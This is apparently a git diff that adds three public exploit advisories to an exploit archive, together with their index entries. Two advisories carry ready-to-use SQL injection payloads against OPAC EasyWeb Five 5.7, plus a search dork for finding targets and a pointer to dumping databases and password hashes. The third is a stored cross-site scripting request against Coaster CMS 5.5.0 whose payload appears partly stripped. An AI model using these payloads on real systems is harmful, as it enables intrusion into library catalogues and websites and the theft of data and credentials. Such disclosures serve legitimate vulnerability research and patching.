diff --git a/exploits/php/webapps/45518.txt b/exploits/php/webapps/45518.txt new file mode 100644 index 000000000..aeb8a8104 --- /dev/null +++ b/exploits/php/webapps/45518.txt @@ -0,0 +1,21 @@ +# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection +# Dork: inurl:"index.php?scelta=campi" +# Date: 2018-10-02 +# Exploit Author: Dino Barlattani +# Vendor Homepage: http://www.nexusfi.it/ +# Software Link: http://www.nexusfi.it/easyweb.php +# Version: 5.7 +# Category: Webapps +# Platform: PHP +# CVE: N/A + +# POC: +# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang= + +# You can use sqlmap for dump entire database and dumping hash + +scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT +COUNT(*),CONCAT(0x7176627a71,(SELECT +(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION +SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND +'CrYc'='CrYc&lang= \ No newline at end of file diff --git a/exploits/php/webapps/45519.txt b/exploits/php/webapps/45519.txt new file mode 100644 index 000000000..a13887b20 --- /dev/null +++ b/exploits/php/webapps/45519.txt @@ -0,0 +1,147 @@ +# Exploit Title: Coaster CMS 5.5.0 - Cross-Site Scripting +# Date: 2018-10-01 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.web-feet.co.uk/ +# Software Link : https://github.com/Web-Feet/coastercms +# Software : Coaster CMS +# Product Version: v5.5.0 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : N/A + +# A Stored XSS vulnerability has been discovered in the v5.5.0 version of the Coaster CMS product. + +# HTTP POST Request : + +POST /admin/pages/edit/26 HTTP/1.1 +Host: demo.coastercms.org +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://demo.coastercms.org/admin/pages/edit/26 +Content-Type: multipart/form-data; boundary=---------------------------24464570528145 +Content-Length: 3353 +Cookie: __cfduid=ddc0ae999f19fa783083ea0c7fdce0ba41538397617; XSRF-TOKEN=eyJpdiI6IndLeTBrZVwvWkdzUE9JSTArU3FOQ3BRPT0iLCJ2YWx1ZSI6InlsZ3Jib0ZNQTM3TXZEZGlwd0hJZmg1aHRibGZDWHZTcmordkRKbnRHWVVjYUJ4TlFOSGdYNkFIWHBSdlozUlY1c3ZJQjNuek9tOW92WXE5SkloOHZ3PT0iLCJtYWMiOiI0MzkzZjU1YWNiNDU2MDhkMDVhMDMwZDkwZTNhZjc4NGI5YzMzZjk0N2Q4YmJmYzY3NWZlZjg1MzVjYTJmMWY2In0%3D; laravel_session=eyJpdiI6IkNhM0Roc280SjE2aFcweXlcLzZwR2hRPT0iLCJ2YWx1ZSI6IldoUG9xTnNqRjh2TlBrQW51NlhqU1hCa3NIZmhSczFlYWE5Mkxza3dMWThkbFZcL2E1VmVTRExCa3h2ckMrdDliajZSTjRSUnhQcEJiek1pSjZ6VGRyZz09IiwibWFjIjoiMmQ0YjBkMmY1NDQ4ODdjOWVhZWUyMDFkY2UwMTlkNTM4ZmEyMGE4YjAwMDVkYmQ3ODZiZWUyOWM4OWQzODg4ZSJ9 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------24464570528145 +Content-Disposition: form-data; name="_token" + +ZeLPiM6IJlkjRf0tosDFjMNPOXVsPv5YioF6092P +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[19]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[20]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[21]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[34]" + +Search +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[36]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[33]" + +

"> + +

+-----------------------------24464570528145 +Content-Disposition: form-data; name="block[1][exists]" + +1 +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[1][select]" + +posts +-----------------------------24464570528145 +Content-Disposition: form-data; name="publish" + +publish +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[35][source]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="block[35][alt]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[parent]" + +0 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info_lang[name]" + +Search +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info_lang[url]" + +search +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[link]" + +0 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info_other[group_radio]" + +0 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[group_container]" + +0 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[group_container_url_priority]" + +0 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[template][exists]" + +1 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[template][select]" + +3 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[live][exists]" + +1 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[live][select]" + +1 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[live_start]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[live_end]" + + +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[sitemap][exists]" + +1 +-----------------------------24464570528145 +Content-Disposition: form-data; name="page_info[sitemap][select]" + +1 +-----------------------------24464570528145 +Content-Disposition: form-data; name="versionFrom" + +4 +-----------------------------24464570528145 +Content-Disposition: form-data; name="duplicate" + +0 +-----------------------------24464570528145-- \ No newline at end of file diff --git a/exploits/php/webapps/45521.txt b/exploits/php/webapps/45521.txt new file mode 100644 index 000000000..a5a4bae5f --- /dev/null +++ b/exploits/php/webapps/45521.txt @@ -0,0 +1,22 @@ +# Exploit Title: OPAC EasyWeb Five 5.7 - 'nome' SQL Injection +# Dork: N/A +# Exploit Author: Ihsan Sencan +# Date: 2018-10-02 +# Vendor Homepage: http://www.nexusfi.it/ +# Software Link: http://www.nexusfi.it/easyweb.php +# Version: 5.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# POST /easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008 HTTP/1.1 + +nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + +nome=') AND ROW(3,6)>(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM (SELECT 66 UNION SELECT 7030 UNION SELECT 4751 UNION SELECT 1310)a GROUP BY x)-- Efe + + +http://Target/easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008 +nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2bb3a97ac..90503960b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40057,3 +40057,6 @@ id,file,description,date,author,type,platform,port 45513,exploits/php/webapps/45513.txt,"Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php, 45514,exploits/php/webapps/45514.txt,"WUZHICMS 2.0 - Cross-Site Scripting",2018-10-01,Renzi,webapps,php, 45515,exploits/hardware/webapps/45515.txt,"Billion ADSL Router 400G 20151105641 - Cross-Site Scripting",2018-10-01,cakes,webapps,hardware, +45518,exploits/php/webapps/45518.txt,"OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection",2018-10-02,"Dino Barlattani",webapps,php, +45519,exploits/php/webapps/45519.txt,"Coaster CMS 5.5.0 - Cross-Site Scripting",2018-10-02,"Ismail Tasdelen",webapps,php, +45521,exploits/php/webapps/45521.txt,"OPAC EasyWeb Five 5.7 - 'nome' SQL Injection",2018-10-02,"Ihsan Sencan",webapps,php,